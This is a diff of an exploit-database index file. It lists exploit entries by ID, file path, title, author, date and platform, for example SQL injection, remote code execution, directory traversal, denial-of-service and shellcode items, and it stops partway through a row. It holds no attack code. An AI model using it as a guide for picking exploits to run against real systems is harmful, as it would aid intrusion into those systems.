id,file,description,date,author,platform,type,port 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0 -20047,platforms/windows/remote/20047.txt,"Microsoft Windows 2000 Telnet Server DoS Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 +20047,platforms/windows/remote/20047.txt,"Microsoft Windows 2000 Telnet Server DoS Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 20049,platforms/windows/remote/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 Resource Exhaustion Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service Vulnerability",2000-06-30,"Marc of eEye",windows,dos,0 @@ -17385,11 +17417,11 @@ id,file,description,date,author,platform,type,port 20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 SMDR.NLM Denial of Service Vulnerability",2000-07-11,"Dimuthu Parussalla",novell,dos,0 20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 insecure perl ""open"" Vulnerability",2000-07-12,"Joey Hess",unix,local,0 20074,platforms/windows/remote/20074.java,"Infopulse GateKeeper 3.5 - Buffer Overflow Vulnerability",2000-07-13,Wizdumb,windows,remote,0 -20075,platforms/linux/remote/20075.c,"Conectiva 4.x/5.x,Debian 2.x,RedHat 6.x,S.u.S.E 6.x/7.0,Trustix 1.x rpc.statd Remote Format String (1)",2000-07-16,drow,linux,remote,0 -20076,platforms/linux/remote/20076.c,"Conectiva 4.x/5.x,Debian 2.x,RedHat 6.x,S.u.S.E 6.x/7.0,Trustix 1.x rpc.statd Remote Format String (2)",2000-08-01,Doing,linux,remote,0 -20077,platforms/linux/remote/20077.c,"Conectiva 4.x/5.x,Debian 2.x,RedHat 6.x,S.u.S.E 6.x/7.0,Trustix 1.x rpc.statd Remote Format String (3)",2000-08-03,ron1n,linux,remote,0 -20078,platforms/windows/remote/20078.pl,"Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (1)",2000-07-18,"Ussr Labs",windows,remote,0 -20079,platforms/windows/remote/20079.txt,"Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2)",2000-07-18,"Ussr Labs",windows,remote,0 +20075,platforms/linux/remote/20075.c,"Conectiva 4.x/5.x_Debian 2.x_RedHat 6.x_S.u.S.E 6.x/7.0_Trustix 1.x rpc.statd Remote Format String (1)",2000-07-16,drow,linux,remote,0 +20076,platforms/linux/remote/20076.c,"Conectiva 4.x/5.x_Debian 2.x_RedHat 6.x_S.u.S.E 6.x/7.0_Trustix 1.x rpc.statd Remote Format String (2)",2000-08-01,Doing,linux,remote,0 +20077,platforms/linux/remote/20077.c,"Conectiva 4.x/5.x_Debian 2.x_RedHat 6.x_S.u.S.E 6.x/7.0_Trustix 1.x rpc.statd Remote Format String (3)",2000-08-03,ron1n,linux,remote,0 +20078,platforms/windows/remote/20078.pl,"Microsoft Outlook 97/98/2000_ Outlook Express 4.0/5.0 GMT Field Buffer Overflow (1)",2000-07-18,"Ussr Labs",windows,remote,0 +20079,platforms/windows/remote/20079.txt,"Microsoft Outlook 97/98/2000_ Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2)",2000-07-18,"Ussr Labs",windows,remote,0 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 DoS Vulnerability",2000-07-18,wildcoyote,windows,dos,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 Weak Encryption Method Vulnerability",2000-07-18,"Brian Carrier",windows,local,0 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read Vulnerability",2000-07-14,mandark,unix,remote,0 @@ -17414,17 +17446,16 @@ id,file,description,date,author,platform,type,port 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 Unauthenticated MLST Command Remote DoS",2000-07-21,"Blue Panda",windows,dos,0 20103,platforms/windows/remote/20103.txt,"analogx simpleserver:www 1.0.6 - Directory Traversal Vulnerability",2000-07-26,"Foundstone Inc.",windows,remote,0 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - %00 Request File/Directory Disclosure Vulnerability",2000-07-21,zorgon,multiple,remote,0 -20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x,RedHat 6.x pam_console Remote User Vulnerability",2000-07-27,bkw1a,linux,remote,0 +20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x_RedHat 6.x pam_console Remote User Vulnerability",2000-07-27,bkw1a,linux,remote,0 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability",2000-08-01,"Sir Dystic",windows,remote,0 20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create Vulnerability",2000-07-28,"Tanaka Akira",unix,local,0 20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - Checkin.prog Binary Execution Vulnerability",2000-06-28,"Tanaka Akira",unix,local,0 -20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",2012-07-27,metasploit,windows,local,0 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload Vulnerability",2012-07-27,metasploit,php,webapps,0 20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",2012-07-27,metasploit,windows,remote,0 20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",2012-07-27,metasploit,linux,remote,0 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR and DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 -20120,platforms/windows/remote/20120.pl,"httpdx <= 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 -20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,metasploit,windows,remote,8082 +20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (4)",2000-10-17,BoloTron,windows,remote,0 +20145,platforms/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution Vulnerability",2000-08-08,"Brian Masney",linux,remote,0 20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid parameter) Blind SQLi",2012-07-30,Kc57,php,webapps,0 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - XSS Vulnerability",2012-07-31,"Oliver Karow",windows,webapps,0 20125,platforms/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote,0 @@ -17441,13 +17472,12 @@ id,file,description,date,author,platform,type,port 20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 Format String Vulnerability",2000-08-02,"Juliano Rizzo",windows,remote,0 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 xfs truncate() Privilege Check Vulnerability",1997-02-01,"Last Stage of Delirium",irix,local,0 20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x mail Vulnerability",1997-09-01,"Last Stage of Delirium",irix,local,0 -20139,platforms/multiple/remote/20139.txt,"Sun JDK 1.1.x,Sun JRE 1.1.x Listening Socket Vulnerability",2000-08-03,"Alexey Yarovinsky",multiple,remote,0 +20139,platforms/multiple/remote/20139.txt,"Sun JDK 1.1.x_Sun JRE 1.1.x Listening Socket Vulnerability",2000-08-03,"Alexey Yarovinsky",multiple,remote,0 20140,platforms/multiple/remote/20140.txt,"Netscape Communicator 4.x URL Read Vulnerability",2000-08-03,"Dan Brumleve",multiple,remote,0 20141,platforms/linux/local/20141.pl,"Suidperl 5.00503 Mail Shell Escape Vulnerability (1)",2000-08-07,"Sebastian Krahmer",linux,local,0 20142,platforms/linux/local/20142.sh,"Suidperl 5.00503 Mail Shell Escape Vulnerability (2)",2000-08-07,"Michal Zalewski",linux,local,0 20143,platforms/linux/remote/20143.txt,"Luca Deri ntop 1.2 a7-9 Unauthorized File Retrieval Vulnerability",2000-08-02,dubhe,linux,remote,0 20144,platforms/solaris/remote/20144.txt,"Sun AnswerBook2 1.4.2/1.4.3/1.4.4 Administration Interface Access",2000-08-08,"Lluis Mora",solaris,remote,0 -20145,platforms/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution Vulnerability",2000-08-08,"Brian Masney",linux,remote,0 20146,platforms/solaris/remote/20146.txt,"Solaris AnswerBook2 - Remote Command Execution Vulnerability",2000-08-07,"Lluis Mora",solaris,remote,0 20147,platforms/solaris/local/20147.sh,"Tech-Source Raptor GFX PGX32 2.3.1 Config Tool Vulnerability",2000-08-02,suid,solaris,local,0 20148,platforms/windows/remote/20148.pl,"MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow Vulnerability",2000-08-10,Zan,windows,remote,0 @@ -17485,7 +17515,7 @@ id,file,description,date,author,platform,type,port 20181,platforms/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 KDC Spoofing Vulnerability",2000-08-28,"Dug Song",multiple,remote,0 20182,platforms/windows/remote/20182.txt,"Ipswitch IMail 6.x File Attachment Vulnerability",2000-08-30,Timescape,windows,remote,0 20183,platforms/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 - author.file Write Vulnerability",2000-08-29,n30,cgi,remote,0 -20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1,SpyNet CaptureNet 3.0.12 - Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 +20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1_SpyNet CaptureNet 3.0.12 - Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 20185,platforms/linux/local/20185.c,"RedHat 6 glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 @@ -17496,11 +17526,12 @@ id,file,description,date,author,platform,type,port 20192,platforms/unix/local/20192.txt,"LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities",2000-09-06,"Dixie Flatline",unix,local,0 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 dccscan unprivileged read Vulnerability",2000-09-06,"Dixie Flatline",unix,local,0 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution Vulnerability",2000-08-30,teleh0r,cgi,remote,0 -20195,platforms/lin_x86/shellcode/20195.c,"Linux x86 ASLR deactivation - 83 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20197,platforms/php/webapps/20197.txt,"joomla joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0 20198,platforms/php/webapps/20198.txt,"am4ss <= 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0 20199,platforms/php/webapps/20199.php,"am4ss Support System 1.2 PHP Code Injection Exploit",2012-08-02,i-Hmx,php,webapps,0 +20299,platforms/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (2)",2000-10-21,"Roelof Temmingh",windows,remote,0 +20300,platforms/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (3)",2000-10-17,zipo,windows,remote,0 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver Privilege Escalation",2012-08-02,anonymous,linux,local,0 20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,metasploit,windows,remote,0 20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 SQL Injection",2012-08-03,metasploit,windows,remote,0 @@ -17526,6 +17557,7 @@ id,file,description,date,author,platform,type,port 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/remote/20225.pl,"Alt-N MDaemon 3.1.1 DoS Vulnerability",1999-12-01,"Ussr Labs",windows,remote,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 +20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0 20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server Remote DoS Vulnerability",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin DoS Vulnerability",2000-09-15,"Rude Yak",multiple,dos,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Local Root Compromise",2000-06-24,"Stephen J. Friedl",sco,local,0 @@ -17556,18 +17588,21 @@ id,file,description,date,author,platform,type,port 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability",2000-10-03,"BindView's Razor Team",windows,dos,0 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x fstat Format String Vulnerability",2000-10-04,K2,openbsd,local,0 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 -20258,platforms/multiple/remote/20258.c,"HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 -20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 +20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 +20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0 +20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,metasploit,windows,local,0 +20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload Vulnerability",2012-08-15,metasploit,php,remote,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow ASLR bypass",2012-08-05,pole,windows,local,0 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 permissions File Manipulation Vulnerability",1995-03-02,"Larry Glaze",irix,local,0 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability",2000-10-03,"BindView's Razor Team",windows,local,0 20266,platforms/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0 +20298,platforms/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0 20268,platforms/php/webapps/20268.txt,"Tickets CAD 2.20G Multiple Vulnerabilities",2012-08-05,chap0,php,webapps,0 20269,platforms/windows/remote/20269.txt,"Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability",2000-10-04,"David Litchfield",windows,remote,0 20270,platforms/php/webapps/20270.txt,"Wordpress Plugin Effective Lead Management 3.0.0 - Persistent XSS",2012-08-05,"Chris Kellum",php,webapps,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x Pending ARP Request Remote DoS Vulnerability",2000-10-05,skyper,openbsd,dos,0 -20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability",1998-08-02,L.Facq,windows,dos,0 +20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 & UnityMail 2.0 - MIME Header DoS Vulnerability",1998-08-02,L.Facq,windows,dos,0 20273,platforms/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure Vulnerability",2000-10-02,CDI,cgi,remote,0 20274,platforms/multiple/local/20274.pl,"IBM WebSphere 2.0/3.0 ikeyman Weak Encrypted Password Vulnerability",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'iplncal.sh' Permissions Vulnerability",2000-10-10,@stake,solaris,local,0 @@ -17593,10 +17628,6 @@ id,file,description,date,author,platform,type,port 20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution",2012-08-06,rgod,windows,dos,0 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow ASLR Bypass (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 20297,platforms/windows/remote/20297.rb,"Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",2012-08-06,metasploit,windows,remote,0 -20298,platforms/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0 -20299,platforms/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (2)",2000-10-21,"Roelof Temmingh",windows,remote,0 -20300,platforms/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (3)",2000-10-17,zipo,windows,remote,0 -20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (4)",2000-10-17,BoloTron,windows,remote,0 20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (5)",2000-10-17,"Andrea Spabam",windows,remote,0 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure Vulnerability",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 visiadmin.exe Denial of Service Vulnerability",1999-06-05,"Valentin Perelogin",windows,dos,0 @@ -17607,7 +17638,7 @@ id,file,description,date,author,platform,type,port 20309,platforms/windows/remote/20309.txt,"Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability",1997-08-25,"Vytis Fedaravicius",windows,remote,0 20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 Pickup Directory DoS Vulnerability",2000-02-15,Valentijn,windows,dos,0 20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' DoS Vulnerability",2000-10-23,Martin,windows,dos,0 -20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 oidldap Vulnerability",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 +20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 oidldap Vulnerability",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 20313,platforms/multiple/remote/20313.txt,"Allaire JRun 3 - Directory Disclosure Vulnerability",2000-10-23,"Foundstone Labs",multiple,remote,0 20314,platforms/multiple/remote/20314.txt,"Allaire JRun 2.3 - Arbitrary Code Execution Vulnerability",2000-10-23,"Foundstone Labs",multiple,remote,0 20315,platforms/multiple/remote/20315.txt,"Allaire JRun 2.3 File Source Code Disclosure Vulnerability",2000-10-23,"Foundstone Labs",multiple,remote,0 @@ -17623,7 +17654,7 @@ id,file,description,date,author,platform,type,port 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 20326,platforms/unix/local/20326.sh,"ntop 1.x -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 Username Validity Disclosure Vulnerability",1999-08-23,"Eilon Gishri",unix,remote,0 -20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 +20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File Vulnerability",2000-10-20,"Kyong-won Cho",hp-ux,local,0 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution Vulnerability",2000-10-26,blackangels,hardware,remote,0 20331,platforms/hardware/remote/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0 @@ -17677,7 +17708,7 @@ id,file,description,date,author,platform,type,port 20379,platforms/windows/dos/20379.txt,"Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 Developer Remote Overflow",2000-04-04,"Bruce Potter",windows,dos,0 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 Hidden Process Disclosure Vulnerability",2000-11-01,f8labs,unix,local,0 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 Root Directory Inode Disclosure Vulnerability",2000-11-01,f8labs,unix,local,0 -20382,platforms/unix/local/20382.pl,"Debian 2.x,RedHat 6.2,IRIX 5/6, Solaris 2.x Mail Reply-To Field Vulnerability",2000-11-01,"Gregory Duchemin",unix,local,0 +20382,platforms/unix/local/20382.pl,"Debian 2.x_RedHat 6.2_IRIX 5/6_ Solaris 2.x Mail Reply-To Field Vulnerability",2000-11-01,"Gregory Duchemin",unix,local,0 20383,platforms/windows/local/20383.txt,"Microsoft IIS 4.0 ISAPI Buffer Overflow Vulnerability",2000-11-06,"Marc Maiffret",windows,local,0 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 Executable File Parsing Vulnerability",2000-11-06,Nsfocus,windows,remote,0 20385,platforms/linux/local/20385.sh,"RedHat restore 0.4 b15 Insecure Environment Variables Vulnerability",2000-11-04,fish,linux,local,0 @@ -17695,6 +17726,7 @@ id,file,description,date,author,platform,type,port 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion Vulnerability",2012-08-10,GoLd_M,php,webapps,0 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0 20400,platforms/cgi/remote/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 DoS Vulnerability",2000-11-10,sozni,cgi,remote,0 +21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0 20403,platforms/windows/remote/20403.txt,"Small HTTP server 2.0 1 Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,remote,0 @@ -17709,6 +17741,7 @@ id,file,description,date,author,platform,type,port 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 JSP Source Disclosure Vulnerability",2000-11-21,"Wojciech Woch",jsp,remote,0 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal AFS Buffer Overflow Vulnerability",2000-11-18,mat,unix,remote,0 +20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - (.wms) Arbitrary Script Vulnerability",2000-11-22,"Sandro Gauci",windows,remote,0 20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin <= 2.1 - SQL Injection Vulnerability",2012-08-10,StRoNiX,php,webapps,0 20417,platforms/osx/local/20417.c,"Tunnelblick - Local Root Exploit",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 @@ -17716,7 +17749,6 @@ id,file,description,date,author,platform,type,port 20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 20422,platforms/php/webapps/20422.txt,"MobileCartly 1.0 - Arbitrary File Write Vulnerability",2012-08-10,"Yakir Wizman",php,webapps,0 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 sample script Vulnerability",1997-07-15,"Francisco Torres",cgi,remote,0 -20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - (.wms) Arbitrary Script Vulnerability",2000-11-22,"Sandro Gauci",windows,remote,0 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 Insecure Registration Vulnerability",2000-11-22,"Joey Maier",multiple,remote,0 20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 Index.dat Vulnerability",2000-11-23,"Georgi Guninski",windows,remote,0 20427,platforms/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - (.asx) Buffer Overflow Vulnerability",2000-11-22,@stake,windows,remote,0 @@ -17727,8 +17759,8 @@ id,file,description,date,author,platform,type,port 20432,platforms/windows/local/20432.txt,"Network Associates WebShield SMTP 4.5 Invalid Outgoing Recipient Field DoS Vulnerability",2000-11-23,"Jari Helenius",windows,local,0 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 Metacharacter Vulnerability",1999-11-09,"Cody T. - hhp",cgi,remote,0 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal Vulnerability",1998-01-26,"Dennis Moore",cgi,remote,0 -20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability",1996-04-01,@stake,cgi,remote,0 -20436,platforms/unix/local/20436.sh,"Mac OS X 10,HP-UX 9/10/11,Mandriva 6/7,RedHat 5/6,SCO 5,IRIX 6 Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 +20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing Vulnerability",1996-04-01,@stake,cgi,remote,0 +20436,platforms/unix/local/20436.sh,"Mac OS X 10_HP-UX 9/10/11_Mandriva 6/7_RedHat 5/6_SCO 5_IRIX 6 Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 20437,platforms/windows/dos/20437.c,"Windows 3.11/95/NT 4.0/NT 3.5.1 - ""Out Of Band"" Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 20438,platforms/windows/dos/20438.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - ""Out Of Band"" Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 20439,platforms/windows/dos/20439.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - ""Out Of Band"" Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 @@ -17737,19 +17769,19 @@ id,file,description,date,author,platform,type,port 20442,platforms/cgi/remote/20442.html,"Greg Matthews Classifieds.cgi 1.0 Hidden Variable Vulnerability",1998-12-15,anonymous,cgi,remote,0 20443,platforms/osx/local/20443.sh,"Tunnelblick - Local Root Exploit (2)",2012-08-11,zx2c4,osx,local,0 20444,platforms/cgi/remote/20444.txt,"Greg Matthews Classifieds.cgi 1.0 Metacharacter Vulnerability",1998-12-15,anonymous,cgi,remote,0 -20445,platforms/windows/remote/20445.txt,"IIS 